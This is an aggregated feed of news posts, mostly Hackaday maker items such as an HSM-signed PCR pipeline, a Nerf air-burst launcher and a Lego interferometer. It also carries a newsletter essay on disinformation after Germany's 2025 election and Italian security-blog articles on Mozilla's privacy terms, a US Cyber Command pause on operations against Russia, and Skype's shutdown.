But there’s also a time and a place for practicing precision, especially when you see a need for it up ahead. Drilling the big holes dead center got me back in the swing of things, and they needed to get drilled one way or the other. I find it useful to think about the job first, plan ahead where the tricky bits are going to be, and then treat the “easy” stuff along the way as practice for the more demanding operations. Hope you do too!

This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!

hackaday.com/2025/03/01/practi…

Money, status, or even survival – there’s no shortage of incentives for faking results in the scientific community. What can we do to prevent it, or at least make it noticeable? One possible solution is cryptographic signing of measurement results.

Here’s a proof-of-concept from [Clement Heyd] and [Arbion Halili]. They took a ThermoFisher Scientific 7500 Fast PCR (Polymerase Chain Reaction) machine, isolated its daughter-software, and confined it into a pipeline that automatically signs each result with help of a HSM (Hardware Security Module).

A many machines do, this one has to be paired to a PC, running bespoke software. This one’s running Windows XP, at least! The software got shoved into a heavily isolated virtual machine running XP, protected by TEE (Trusted Execution Environment). The software’s output is now piped into a data diode virtual serial port out of the VM, immediately signed with the HSM, and signed data is accessible through a read-only interface. Want to verify the results’ authenticity? Check them against the system’s public key, and you’re golden – in theory.

This design is just a part of the puzzle, given a typical chain of custody for samples in medical research, but it’s a solid start – and it happens to help make the Windows XP setup more resilient, too.

Wondering what PCR testing is good for? Tons of things all over the medical field, for instance, we’ve talked about PCR in a fair bit of detail in this article about COVID-19 testing. We’ve also covered a number of hacker-built PCR and PCR-enabling machines, from deceivingly simple to reasonably complex!

hackaday.com/2025/03/01/making…

Good morning! There's a bonus edition of Digital Politics this week. I'm Mark Scott, and I've spent the last six days assessing what to make of the recent German federal election on Feb 23.

Despite fears of record levels of foreign interference, the outcome was what almost everyone predicated. Already, some are claiming victory in the fight against online disinformation aimed at undermining the country's democratic institutions.

That would be a mistake. Below is a cross-post from my analysis for Tech Policy Press.

Let's get started:

Lessons from Germany's federal election

A week has passed since Germany’s federal election, and many are breathing a sigh of relief.

Friedrich Merz, a 69-year-old center-right politician, will almost certainly become the country’s next Chancellor, though a ruling coalition government — between Merz’s Christian Democrat Union (CDU) and the center-left Social Democratic Party (SDP) — won’t be formed until mid-April, at the earliest.

Alternative for Deutschland (AfD), a far-right party that garnered support from the likes of US Vice President JD Vance and Elon Musk, finished second in the election with just under 21 percent of the national vote. That party had found vocal support with younger, male voters, particularly in the Eastern parts of Germany, and had garnered significant traction across social media — particularly on Musk’s X, formerly known as Twitter.

Yet widespread fears around online election interference, either promoted by foreign countries like Russia or amplified by fringe domestic groups spreading conspiracy theories around alleged voter fraud or Germany’s supposed misguided support for Ukraine, did not materialize.

The result of Germany’s Feb 23 election was as many had predicted. The country’s vote now joins a growing list of national elections — including scores during 2024 in which more than two billion people voted globally — where close scrutiny from regulators, national security officials and outside researchers has discovered that foreign actors’ both overt and clandestine efforts to sway voters’ decisions proved less successful than first imagined.

Thanks for reading Digital Politics. If you've been forwarded this newsletter (and like what you've read), please sign up here. For those already subscribed, reach out on digitalpolitics@protonmail.com

Yet the relief now felt in Germany — that the country’s democratic institutions withstood what national officials and outsiders claimed were unprecedented levels of election-related foreign interference — is misplaced.

It fundamentally misunderstands that digital attacks on countries’ electoral processes can not be combatted solely during short election campaign cycles during which heightened attention is aimed at such malign actors. Instead, foreign adversaries and domestic groups that often amplify state-backed online propaganda are in this for the long haul — and their activities should be viewed over years, if not decades.

Why no one should claim 'mission accomplished'

Any claims — in Germany or other democratic countries — that national officials, tech companies and civil society groups were able to thwart digital interference attacks ahead of individual elections represent a false economy. For one, it’s almost impossible to link specific examples of online state-backed propaganda and covert influence campaigns to how voters cast ballots. For another, those online attacks don’t just stop because a country’s election cycle has come to an end.

Even as Merz’s CDU political party began haggling with the center-left SPD over a new coalition government, Russia’s state-backed media continued to sow dissent and division within Germany for its own political gain.

RT Deutschland — a Kremlin-back media organization that, while banned within the European Union, is still widely accessible in Germany — pumped out article after article about how the Feb 23 election was unjust; that the failure to include AfD in the coalition government was anti-democratic; and that Germany’s ongoing support for Ukraine represented unjustified war-mongering.

If promoted by domestic actors, such talking points would be legal under the country’s free speech rules. But they were instead amplified by a foreign state adversary whose Kremlin-backed media outlets have been sanctioned because of “disinformation and information manipulation against the EU and its member states.”

Under long-standing political norms dating back to the aftermath of World War Two, Germany’s mainstream political parties have created a so-called “firewall” in which politicians will not allow groups associated with extremist movements, including the AfD, to join coalition governments.

Vance, the US Vice President, recently criticized such practices in a speech in Munich. “Democracy rests on the sacred principle that the voice of the people matters,” he said. “There’s no room for firewalls.”

It’s not just foreign adversaries that have continued to cast doubt on Germany’s election — even after the outcome was a foregone conclusion.

Across multiple Telegram channels, some of which have hundreds of thousands of followers, domestic influencers have spread false claims about rigged ballots; accusations that Germany should not support Ukraine because of its alleged starting of the war with Russia; and allegations the CDU wants to outlaw the AfD. Those messages have been further amplified, primarily on X, where some have garnered attention from non-German social media users and have been picked up by Russia’s state media.

Sign up for Digital Politics

Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.

Subscribe
Email sent! Check your inbox to complete your signup.

No spam. Unsubscribe anytime.

Again, none of these falsehoods are illegal under German law, and can not be removed by platforms under the EU’s Digital Services Act. But this slow dripping of inaccurate information — often within fringe social media communities where fact-checking does not exist — represents an ongoing threat to national democratic institutions, particularly when those domestic messages are further amplified by foreign adversaries.

Ahead of Germany’s Feb 23 election, the country’s officials held a so-called ‘stress test’ with the likes of Meta, TikTok, and X to war-game potential threats to the national vote. Klaus Müller, head of the national regulator in charge of the exercise, said his agency was “well prepared” to combat election-related problems. The European Commission also published advice for how national regulators should protect national elections.

Such efforts should not be prioritized for when countries hold elections.

In the ongoing whack-a-mole fight between national officials seeking to defend countries’ democratic institutions and foreign adversaries eager to undermine those norms via covert influence campaigns and outright online propaganda, it’s now a 24/7, 365-day battle — one that doesn’t just come to an end when the votes have all been counted.

digitalpolitics.co/newsletter0…

Nerf blasters typically fire small foam darts or little foam balls. [Michael Pick] wanted to build something altogether more devastating. To that end, he created a rocket launcher with an advanced air burst capability, intended to take out enemies behind cover.

Unlike Nerf’s own rocket launchers, this build doesn’t just launch a bigger foam dart. Instead, it launches an advanced smart projectile that releases lots of smaller foam submunitions at a set distance after firing.

The rocket launcher itself is assembled out of off-the-shelf pipe and 3D printed components. An Arduino Uno runs the show, hooked up to a Bluetooth module and a laser rangefinder. The rangefinder determines the distance to the target, and the Bluetooth module then communicates this to the rocket projectile itself so it knows when to release its foamy payload after launch. Releasing the submunitions is achieved with a small microservo in the projectile which opens a pair of doors in flight, scattering foam on anyone below. The rockets are actually fired via strong elastic bands, with an electronic servo-controlled firing mechanism.

We’ve featured some great Nerf builds over the years, like this rocket-blasting robot.

youtube.com/embed/umT7IicqUl4?…

hackaday.com/2025/03/01/buildi…

Mozilla ha modificato la sua politica sulla privacy, rimuovendo la promessa di non vendere mai i dati personali degli utenti di Firefox.

Il fatto

In precedenza nelle FAQ dell’azienda era la seguente : “No. Non l’abbiamo mai fatto e non lo faremo mai. E ti proteggiamo da molti degli inserzionisti che lo fanno. I prodotti Firefox sono progettati per proteggere la tua privacy. È una promessa.”

Ora questa è una dichiarazione scomparsa e la nuova sezione sulla privacy afferma che Mozilla non fa più promesse così ampie. L’azienda spiega questo fatto con il fatto che in alcune giurisdizioni il termine “vendita di dati” viene interpretato in modo troppo ampio.

Mozilla afferma che non vende i dati nel modo più usuale del termine ma è costretta a condividere alcune informazioni con i partner. L’azienda afferma che tali dati vengono resi anonimi, aggregati o elaborati tramite tecnologie che migliorano la privacy.

Gli utenti reagiscono: “Questo è inaccettabile”

A seguito dell’aggiornamento dei termini di servizio, gli utenti hanno espresso la loro insoddisfazione nelle discussioni su Guida in linea E Reddit . Erano particolarmente preoccupati per il punto, secondo cui Inserendo le proprie informazioni in Firefox, gli utenti concedono automaticamente all’azienda una licenza gratuita e mondiale per il loro utilizzo.

Mozilla sotto pressione da parte dei critici ha poi corretto la formulazione : i termini ora chiariscono che la licenza è richiesta solo per il funzionamento del browser e non conferisce all’azienda la proprietà dei contenuti dell’utente. Tuttavia, molti utenti sono rimasti insoddisfatti. Uno di loro notato : “Non si tratta di una questione di formulazione. Non possiamo pretendere dagli utenti diritti così ampi sui loro dati.”

Inoltre, Mozilla riconosce di condividere le parole chiave delle query di ricerca con i partner, compresi i dati sulla posizione, ma assicura che lo fa in forma anonima. L’azienda sottolinea che gli utenti possono disattivare questa funzione nelle impostazioni di Firefox.

Molti però non hanno creduto alle spiegazioni dell’azienda. Un utente ha risposto al commento di Mozilla: “Questa è una totale assurdità e lo sai. La funzionalità di base di un browser è caricare e visualizzare le pagine web.”

L'articolo Mozilla Ci Ripensa: Ora Può Vendere i Tuoi Dati Personali? proviene da il blog della sicurezza informatica.

Il mese scorso il Segretario alla Difesa degli Stati Uniti, Pete Hegseth, ha ordinato al Cyber ​​Command degli Stati Uniti di sospendere ogni pianificazione di operazioni contro la Russia, compresi gli attacchi informatici offensivi. Lo hanno riferito tre fonti a conoscenza della situazione.

Hegseth ha trasmesso l’ordine al capo del Cyber ​​Command, il generale Timothy Ho, che a sua volta lo ha trasmesso al direttore delle operazioni uscente, il maggiore generale dei Marines Ryan Heritage. Secondo le fonti , la decisione non riguarda la National Security Agency (NSA), di cui Ho è anche a capo, e il suo lavoro di intelligence sui segnali contro la Russia.
Generale Timothy D. Ho
La mossa rientra negli sforzi della Casa Bianca per normalizzare i rapporti con Mosca, dopo che gli Stati Uniti e i loro alleati hanno cercato di isolare il Cremlino a causa del conflitto con l’Ucraina. La scorsa settimana Trump ha incontrato Zelensky a Washington per firmare un accordo che garantirebbe agli Stati Uniti l’accesso alle risorse minerarie ucraine. Tuttavia, l’accordo fallì dopo un’accesa discussione nello Studio Ovale.

La durata dell’ordine di Hegseth rimane sconosciuta, ma il Cyber ​​Command è stato informato che le restrizioni rimarranno in vigore a tempo indeterminato. Heritage, conoscendo tutte le operazioni di comando, deve ora comunicare l’ordine alle unità appropriate, tra cui alla 16th Air Force Cyber ​​Command, responsabile delle operazioni digitali nell’area del Comando Europeo degli Stati Uniti.

Il Cyber ​​Command sta attualmente preparando un rapporto di valutazione dei rischi per Hegseth, che dovrebbe includere un elenco delle operazioni annullate e delle potenziali minacce provenienti dalla Russia.

Se le restrizioni si applicassero solo alle unità impegnate in operazioni informatiche contro Mosca, sarebbero colpite centinaia di specialisti della Cyber ​​National Mission Force e della Cyber ​​Mission Force. Tuttavia, se colpissero anche le unità di intelligence e gli analisti, allora ne risentirebbero migliaia di dipendenti, compresi gli specialisti della NSA.

L’ordine di Hegseth coincide con gli sforzi del Cyber ​​Command per intensificare gli sforzi contro i cartelli della droga messicani, otto dei quali sono stati recentemente designati dall’amministrazione Trump come organizzazioni terroristiche.

Alti funzionari della Casa Bianca chiedono un’azione militare aggressiva contro i cartelli per frenare il flusso di droga negli Stati Uniti.

L'articolo Stop Attacchi Informatici Contro la Russia! L’US Cyber Command è Stato Bloccato proviene da il blog della sicurezza informatica.

Nel mondo della tecnologia, pochi nomi evocano tanta nostalgia quanto Skype. Eppure, dopo due decenni di onorato servizio, Microsoft ha deciso di spegnere per sempre la piattaforma che ha rivoluzionato la comunicazione digitale nei primi anni 2000. A partire da maggio, Skype “non sarà più disponibile”, ha confermato l’azienda su X, invitando gli utenti a migrare su Microsoft Teams, il suo servizio di comunicazione in continua espansione.

Dall’innovazione alla dimenticanza

Skype è stato un pioniere, un software capace di abbattere i costi delle chiamate internazionali e di connettere il mondo con una semplicità fino ad allora inimmaginabile. Nato in Estonia nel 2003, il servizio si diffuse rapidamente, tanto da attirare l’attenzione di eBay, che lo acquistò nel 2005 per 2,6 miliardi di dollari. Tuttavia, il matrimonio tra l’e-commerce e la telefonia VoIP non funzionò, e nel 2009 eBay vendette la sua quota di maggioranza a un consorzio di investitori per 1,9 miliardi di dollari.

Nel 2011, Microsoft entrò in scena con un’acquisizione mastodontica: 8,5 miliardi di dollari in contanti per portare Skype nella propria scuderia. Una mossa che, all’epoca, sembrava destinata a consolidare la posizione di Redmond nel settore delle comunicazioni. Tuttavia, col passare degli anni, il marchio Skype ha iniziato a perdere appeal.

Cosa succederà agli utenti Skype?

Per chi ancora utilizza Skype, Microsoft ha previsto un periodo di transizione fino a maggio 2025. Gli utenti potranno trasferire contatti, cronologia chat e crediti direttamente su Teams, utilizzando le stesse credenziali. Inoltre, fino alla chiusura definitiva, Skype e Teams continueranno a essere interoperabili, permettendo agli utenti di comunicare tra loro indipendentemente dalla piattaforma scelta.

Chi non desidera passare a Teams potrà invece scaricare ed esportare la propria cronologia delle chat prima della chiusura. Per quanto riguarda gli abbonamenti a Skype e il credito telefonico, Microsoft garantirà il trasferimento su Teams, in modo da non penalizzare gli utenti che ancora utilizzano il servizio per chiamate internazionali.

Un declino annunciato

Nonostante un temporaneo rilancio durante la pandemia, quando videoconferenze e chiamate online divennero la norma, Skype ha dovuto affrontare una concorrenza spietata. Zoom, Google Meet, WebEx, Apple FaceTime e WhatsApp hanno gradualmente eroso il suo dominio, offrendo alternative più moderne e integrate con i rispettivi ecosistemi. Nel frattempo, Microsoft ha concentrato sempre più risorse su Teams, integrandolo con Microsoft 365 e puntando sul mercato aziendale.

La chiusura di Skype rappresenta la fine di un’era, ma anche una lezione importante: nel mondo della tecnologia, l’innovazione è una corsa senza fine, e persino i giganti possono finire nel dimenticatoio se non riescono ad adattarsi ai cambiamenti del mercato.

Per chi ha utilizzato Skype nei suoi anni d’oro, il suo addio segna un momento di nostalgia. Ma per Microsoft, questo è solo un altro passo verso un futuro in cui Teams è destinato a dominare il settore delle comunicazioni digitali.

L'articolo Skype Addio Per Sempre! Microsoft chiude il pioniere delle videocall dopo 20 anni di servizio proviene da il blog della sicurezza informatica.

Nickel contamination can render soils infertile at levels that are currently impractical to treat. Researchers at UMass Amherst are looking at how plants can help these soils and source nickel for the growing EV market.

Phytoremediation is the use of plants that preferentially hyperaccumulate certain contaminants to clean the soil. When those contaminants are also critical materials, you get phytomining. Starting with Camelina sativa, the researchers are looking to enhance its preference for nickel accumulation with genes from the even more adept hyperaccumulator Odontarrhena to have a quick-growing plant that can be a nickel feedstock as well as produce seeds containing oil for biofuels.

Despite being able to be up to 3% Ni by weight, Odontarrhena was ruled out as a candidate itself due to its slow-growing nature and that it is invasive to the United States. The researchers are also looking into what soil amendments can best help this super Camelina sativa best achieve its goals. It’s no panacea for expected nickel demand, but they do project that phytomining could provide 20-30% of our nickel needs for 50 years, at which point the land could be turned back over to other uses.

Recycling things already in technical cycles will be important to a circular economy, but being able to remove contaminants from the environment’s biological cycles and place them into a safer technical cycle instead of just burying them will be a big benefit as well. If you want learn about a more notorious heavy metal, checkout our piece on the blessings and destruction wrought by lead.

youtube.com/embed/zYB-DlEtFdE?…

hackaday.com/2025/02/28/phytor…

Lego! It’s a fun toy that is popular around the world. What you may not realize is that it’s also made to incredibly high standards. As it turns out, the humble building blocks are good enough to build a interferometer if you’re so inclined to want one. [Kyra Cole] shows us how it’s done.

The build in question is a Michelson interferometer; [Kyra] was inspired to build it based on earlier work by the myphotonics project. She was able to assemble holders for mirrors and a laser, as well as a mount for a beamsplitter, and then put it all together on a Lego baseboard. While some non-Lego rubber bands were used in some areas, ultimately, adjustment was performed with Lego Technic gears.

Not only was the Lego interferometer able to generate a proper interference pattern, [Kyra] then went one step further. A Raspberry Pi was rigged up with a camera and some code to analyze the interference patterns automatically.

[Kyra] notes that using genuine Lego bricks was key to her success. Their high level of dimensional accuracy made it much easier to achieve her end goal. Sloppily-built knock-off bricks may have made the build much more frustrating to complete.

We don’t feature a ton of interferometer hacks around these parts. However, if you’re a big physics head, you might enjoy our 2021 article on the LIGO observatory. If you’re cooking up your own physics experiments at home, don’t hesitate to drop us a line!

[Thanks to Peter Quinn for the tip!]

hackaday.com/2025/02/28/buildi…

River tables are something we’ve heard decried as a passé, but we’re still seeing some interesting variations on the technique. Take this example done with bronze instead of epoxy.

Starting with two beautiful slabs of walnut, [Burls Art] decided that instead of cutting them up to make guitars he would turn his attention to a river table to keep them more intact. Given the price of copper and difficulty in casting it, he decided to trim the live edges to make a more narrow “river” to work with for the project.

Since molten copper is quite toasty and wood likes to catch on fire, he wisely did a rough finish of the table before making silicone plugs of the voids instead of pouring metal directly. The silicone plugs were then used to make sand casting molds, and a series of casting trials moving from copper to bronze finally yielded usable pieces for the table. In case that all seems too simple, there were then several days of milling and sanding to get the bronze and walnut level and smooth with each other. The amount of attention to detail and plain old elbow grease in this project is impressive.

We’ve seen some other interesting mix-ups of the live edge and epoxy formula like a seascape night light or this river table with embedded neon. And if you’re looking to get into casting, why not start small in the microwave?

youtube.com/embed/slu4A4L0bqo?…

hackaday.com/2025/02/28/a-diff…